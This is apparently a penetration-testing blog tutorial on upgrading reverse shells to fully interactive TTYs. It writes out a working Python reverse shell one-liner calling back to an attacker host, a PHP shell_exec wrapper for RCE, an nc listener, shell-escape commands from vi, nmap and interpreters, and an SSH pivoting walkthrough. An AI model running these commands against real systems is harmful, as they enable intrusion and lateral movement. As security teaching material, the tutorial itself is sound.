Spawning interactive reverse shells with TTY

6c2e6e2e
4 min read, Feb 28, 2018


Early user terminals connected to computers were electromechanical teleprinters or teletypewriters (TeleTYpewriter, TTY), and TTY has remained the name for the text-only console ever since, even though that console is now a virtual one rather than a physical device.

Often during a penetration test you obtain a shell that has no TTY, yet you want to interact further with the system. For example, here we have two different consoles from two different systems (screenshot in the original post):

In this example we will treat the “guest” server as the attacker machine and “mhnserver” as the target, and we will start with a simple reverse shell:

Our goal for now is to get a TTY shell.

First, the attacker starts a listener on a known port in order to receive the shell:

# nc -l -p 8080

Suppose the attacker is able to run a Python command through an RCE (Remote Code Execution) vulnerability on a web server. To simulate this we will open the PHP interactive shell and use the shell_exec function.


Now we will build the reverse shell in Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Attacker IP Address",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

But because we are exploiting the simulated RCE vulnerability through a website written in PHP, we have to adapt the call:

$output = shell_exec('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Attacker IP Address",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
echo $output;

Note that shell_exec returns only after the command exits, so the PHP call (and, on a real web server, the HTTP request that triggered it) stays blocked for as long as the reverse shell is alive.

The output on the Target Server and on the Attacker Server (screenshots in the original post): the listener on the attacker side now shows an interactive sh prompt coming from the target. The most beautiful image for a hacker.

Now that I have access to the Target Server using a reverse shell to the Attacker Server, I want to connect to a third server through SSH. In other words:

Our goal is to get onto the Secondary Target server. This is called pivoting.

Pivoting is the technique of using a compromised instance (also referred to as a ‘plant’ or ‘foothold’) to “move” around inside a network: the first compromise is used to reach, and to help compromise, systems that are otherwise inaccessible.

Of course this fails, because we do not have a fully interactive TTY shell. ssh does not read the password from stdin; it opens the controlling terminal (/dev/tty) to prompt for it, and a shell whose descriptors are simply dup2'ed onto a socket inside a web server process has no terminal at all:

And, to make things worse, let’s try Ctrl + C.

As we can see we made two mistakes. The stuck command is still sitting on the Target Server, so we could have caused a denial of service there, and we lost our reverse shell: Ctrl + C was interpreted by the attacker’s own terminal, which sent SIGINT to the local nc listener instead of to the remote ssh.

What should we do now? Start again, but this time use one of the following commands to spawn a TTY shell. Which ones work obviously depends on the system environment and the installed packages.

python -c 'import pty; pty.spawn("/bin/sh")'
/bin/sh -i
perl -e 'exec "/bin/sh";'

Or, from within an interpreter or tool that is already running:

python: import os; os.system('/bin/bash')
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
From within IRB:
exec "/bin/sh"
From within vi:
:!bash
From within vi:
:set shell=/bin/bash:shell
From within nmap (only old versions that still have --interactive):
!sh

Second try:

No luck! Try harder!

Of course it failed. I wouldn’t have this tutorial if it did not.

Finally, if all of the above fails, you still have one more option: break your own console to achieve a fully interactive TTY shell. Literally. The trick is to put the attacker’s terminal into raw mode, so that keystrokes such as Ctrl + C, Tab and the arrow keys are no longer interpreted by the attacker’s local line discipline but are passed through nc, as bytes, to the pseudo-terminal on the target, which handles them as a normal terminal would.

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z                                # suspends nc and drops back to the attacker's console

# In Attacker console
$ stty raw -echo                      # raw mode: the local terminal stops interpreting Ctrl-C (and stops echoing)
$ fg                                  # typed blind (no echo any more); resumes nc and the remote shell

# In reverse shell
$ reset                               # reinitialise the remote pty
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>      # use the values `stty size` prints in a normal local terminal
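The two failure modes above (ssh cannot find a terminal in the dup2 shell, and Ctrl + C kills the local nc) can be reproduced without any network. The following is an added example written for this page, not code from the original post: a socketpair stands in for the nc connection, pty.fork stands in for pty.spawn("/bin/sh"), and a small Python reader stands in for whichever program is attached to the terminal (nc on the attacker side, ssh on the target side). PROBE and CHILD are constructed probe scripts and the function names are my own; it assumes Linux or macOS with /bin/sh and a working pty device.

```python
# Added example (not the original post's code): reproduce locally
# (1) why ssh fails in the dup2-on-a-socket shell but works under pty.spawn, and
# (2) what `stty raw -echo` changes about Ctrl-C.
# Assumes Linux or macOS with /bin/sh and a working pty device.
import os
import pty
import signal
import socket
import subprocess
import sys
import tty

# Constructed probe script: does the shell see a terminal on stdin, and can it
# open /dev/tty, which is where ssh reads a password from?
PROBE = (
    "if [ -t 0 ]; then echo stdin=tty; else echo stdin=notty; fi; "
    "if (exec 3</dev/tty) 2>/dev/null; then echo ctty=yes; else echo ctty=no; fi"
)

# Constructed reader for the Ctrl-C experiment: announce readiness, read one
# byte, report it. SIGINT is reset to the default action (terminate).
CHILD = (
    "import os, signal\n"
    "signal.signal(signal.SIGINT, signal.SIG_DFL)\n"
    "os.write(1, b'ready\\n')\n"
    "b = os.read(0, 1)\n"
    "os.write(1, b'byte ' + b.hex().encode() + b'\\n')\n"
)


def _drain(master_fd):
    """Read a pty master until the child side is gone (EOF, or EIO on Linux)."""
    out = b""
    while True:
        try:
            chunk = os.read(master_fd, 4096)
        except OSError:
            break
        if not chunk:
            break
        out += chunk
    return out


def _parse_probe(raw):
    return dict(line.split("=", 1) for line in raw.decode().split())


def probe_over_socket():
    """The one-liner's model: fds 0/1/2 dup2'ed onto a socket. start_new_session
    mimics a web server worker, which has no controlling terminal either."""
    attacker, target = socket.socketpair()
    proc = subprocess.Popen(["/bin/sh", "-c", PROBE], stdin=target.fileno(),
                            stdout=target.fileno(), stderr=target.fileno(),
                            start_new_session=True)
    target.close()                      # our copy; the child keeps its own
    out = b""
    while chunk := attacker.recv(4096):
        out += chunk
    proc.wait()
    attacker.close()
    return _parse_probe(out)            # {'stdin': 'notty', 'ctty': 'no'}


def probe_over_pty():
    """pty.spawn's model: the shell runs on the slave side of a pseudo-terminal
    and is its session leader, so it has a controlling tty."""
    pid, master = pty.fork()
    if pid == 0:                        # child: becomes the shell
        os.execv("/bin/sh", ["/bin/sh", "-c", PROBE])
    out = _drain(master)
    os.close(master)
    os.waitpid(pid, 0)
    return _parse_probe(out)            # {'stdin': 'tty', 'ctty': 'yes'}


def ctrl_c_delivery(raw_mode):
    """Write the Ctrl-C byte (0x03) to a pty whose reader is a child process.
    Cooked mode: the line discipline turns it into SIGINT, which is what kills
    nc in the attacker's console. Raw mode (what `stty raw -echo` sets): the
    byte is plain data, so nc would forward it to the target's pty instead."""
    pid, master = pty.fork()
    if pid == 0:
        if raw_mode:
            tty.setraw(0)               # stdin is the pty slave here
        os.execv(sys.executable, [sys.executable, "-c", CHILD])
    buf = b""
    while b"ready" not in buf:          # don't send Ctrl-C before the reader exists
        buf += os.read(master, 1024)
    os.write(master, b"\x03")
    buf += _drain(master)
    os.close(master)
    _, status = os.waitpid(pid, 0)
    if os.WIFSIGNALED(status) and os.WTERMSIG(status) == signal.SIGINT:
        return "killed by SIGINT"
    return buf.decode().split("byte ", 1)[1].split()[0]   # hex of the byte read


if __name__ == "__main__":
    print("dup2 shell over socket:", probe_over_socket())
    print("shell under pty.spawn: ", probe_over_pty())
    print("cooked tty + Ctrl-C:   ", ctrl_c_delivery(raw_mode=False))
    print("raw tty + Ctrl-C:      ", ctrl_c_delivery(raw_mode=True))
```

Run it once and the picture matches the screenshots: the socket shell reports stdin=notty and ctty=no, which is exactly the situation ssh refuses to prompt in, while the pty shell reports stdin=tty and ctty=yes. The Ctrl-C experiment shows the other half: a reader on a cooked terminal is killed by SIGINT, a reader on a raw terminal simply receives byte 0x03, which is why the attacker's nc survives Ctrl + C only after `stty raw -echo`.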

Proof of Concept (screenshot in the original post):

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo && fg

Jackpot: even the console name changed, and the pivot over SSH now works just fine. One last thing: when the reverse shell eventually closes, your own console is still in raw mode, so type `stty sane` (or `reset`) blind to restore it.

Well, the secret is to try hard enough and at some point you will be able to get fully interactive TTY shells.

Thanks to: https://netsec.ws/?p=337, https://askubuntu.com/questions/481906/what-does-tty-stand-for, https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#tldrcheatsheet and https://www.offensive-security.com/metasploit-unleashed/pivoting/


6c2e6e2e

A common IT Security Specialist, Hacker, Scout and much more.